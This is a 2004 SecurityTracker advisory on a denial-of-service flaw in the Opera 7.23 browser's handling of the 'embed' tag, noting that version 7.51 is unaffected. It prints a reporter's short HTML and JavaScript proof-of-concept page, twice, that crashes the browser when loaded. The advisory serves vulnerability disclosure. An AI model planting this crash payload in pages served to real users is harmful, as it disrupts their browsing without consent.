SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Embed Tag Error Lets Remote Users Crash the Browser
SecurityTracker Alert ID:  1011142
SecurityTracker URL:  http://securitytracker.com/id/1011142
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 2 2004
Impact:   Denial of service via network
Fix Available:  Yes  Exploit Included:  Yes  
Version(s): 7.23 build 3227
Description:   A vulnerability was reported in the Opera browser in the processing of the 'embed' tag. A remote user can create HTML that, when loaded by the target user, will cause the target user's browser to crash.

Stevo reported that the following demonstration exploit can cause Opera to crash:

<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>

</head>
<body onLoad="dSend()">

<embed src="" type="CCCC" name="crash" >
</embed>
</body>
</html>

Impact:   A remote user can cause the target user's browser to crash.
Solution:   Version 7.51 is not affected.
Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  Opera DOS








========

Opera DoS

========



========
Versionsinformation
Version	7.23 	
Build	3227
========



<html>
<head>
<script language=javascript>
function dSend() {
	document.crash.text;
}
</script>

</head>
<body onLoad="dSend()">

          <embed src="" type="CCCC" name="crash" >
         </embed>
</body>
</html>



cheers Stevo

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC